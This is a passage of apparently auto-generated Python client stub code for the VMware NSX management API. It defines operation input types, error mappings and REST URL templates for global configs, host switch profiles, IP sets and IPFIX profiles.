'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
resyncconfig_input_value_validator_list = [
HasFieldsOfValidator()
]
resyncconfig_output_validator_list = [
HasFieldsOfValidator()
]
resyncconfig_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/global-configs/{config-type}?action=resync_config',
request_body_parameter='global_configs',
path_variables={
'config_type': 'config-type',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'config_type': type.StringType(),
'global_configs': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/global-configs/{config-type}',
request_body_parameter='global_configs',
path_variables={
'config_type': 'config-type',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigsListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'resyncconfig': {
'input_type': resyncconfig_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')]),
'errors': resyncconfig_error_dict,
'input_value_validator_list': resyncconfig_input_value_validator_list,
'output_validator_list': resyncconfig_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
'resyncconfig': resyncconfig_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.global_configs',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _HostSwitchProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'base_host_switch_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/host-switch-profiles',
request_body_parameter='base_host_switch_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'host_switch_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
path_variables={
'host_switch_profile_id': 'host-switch-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'host_switch_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
path_variables={
'host_switch_profile_id': 'host-switch-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'hostswitch_profile_type': type.OptionalType(type.StringType()),
'include_system_owned': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'uplink_teaming_policy_name': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/host-switch-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'hostswitch_profile_type': 'hostswitch_profile_type',
'include_system_owned': 'include_system_owned',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'uplink_teaming_policy_name': 'uplink_teaming_policy_name',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'host_switch_profile_id': type.StringType(),
'base_host_switch_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
request_body_parameter='base_host_switch_profile',
path_variables={
'host_switch_profile_id': 'host-switch-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'HostSwitchProfilesListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.host_switch_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _IpSetsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ip_set': type.ReferenceType('com.vmware.nsx.model_client', 'IPSet'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ip-sets',
request_body_parameter='ip_set',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for create_0 operation
create_0_input_type = type.StructType('operation-input', {
'ip_set_id': type.StringType(),
'ip_address_element': type.ReferenceType('com.vmware.nsx.model_client', 'IPAddressElement'),
'action': type.StringType(),
})
create_0_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_0_input_value_validator_list = [
]
create_0_output_validator_list = [
]
create_0_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ip-sets/{ip-set-id}',
request_body_parameter='ip_address_element',
path_variables={
'ip_set_id': 'ip-set-id',
},
query_parameters={
'action': 'action',
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ip_set_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ip-sets/{ip-set-id}',
path_variables={
'ip_set_id': 'ip-set-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ip_set_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ip-sets/{ip-set-id}',
path_variables={
'ip_set_id': 'ip-set-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ip-sets',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ip_set_id': type.StringType(),
'ip_set': type.ReferenceType('com.vmware.nsx.model_client', 'IPSet'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ip-sets/{ip-set-id}',
request_body_parameter='ip_set',
path_variables={
'ip_set_id': 'ip-set-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPSet'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'create_0': {
'input_type': create_0_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPAddressElement'),
'errors': create_0_error_dict,
'input_value_validator_list': create_0_input_value_validator_list,
'output_validator_list': create_0_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPSet'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPSetListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IPSet'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'create_0': create_0_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ip_sets',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _IpfixCollectorProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ipfix_collector_upm_profile': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ipfix-collector-profiles',
request_body_parameter='ipfix_collector_upm_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ipfix_collector_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
path_variables={
'ipfix_collector_profile_id': 'ipfix-collector-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ipfix_collector_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
path_variables={
'ipfix_collector_profile_id': 'ipfix-collector-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'profile_types': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ipfix-collector-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'profile_types': 'profile_types',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ipfix_collector_profile_id': type.StringType(),
'ipfix_collector_upm_profile': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ipfix-collector-profiles/{ipfix-collector-profile-id}',
request_body_parameter='ipfix_collector_upm_profile',
path_variables={
'ipfix_collector_profile_id': 'ipfix-collector-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixCollectorUpmProfile'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ipfix_collector_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _IpfixObsPointsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ipfix-obs-points',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixObsPointsListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ipfix_obs_points',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _IpfixProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ipfix_upm_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
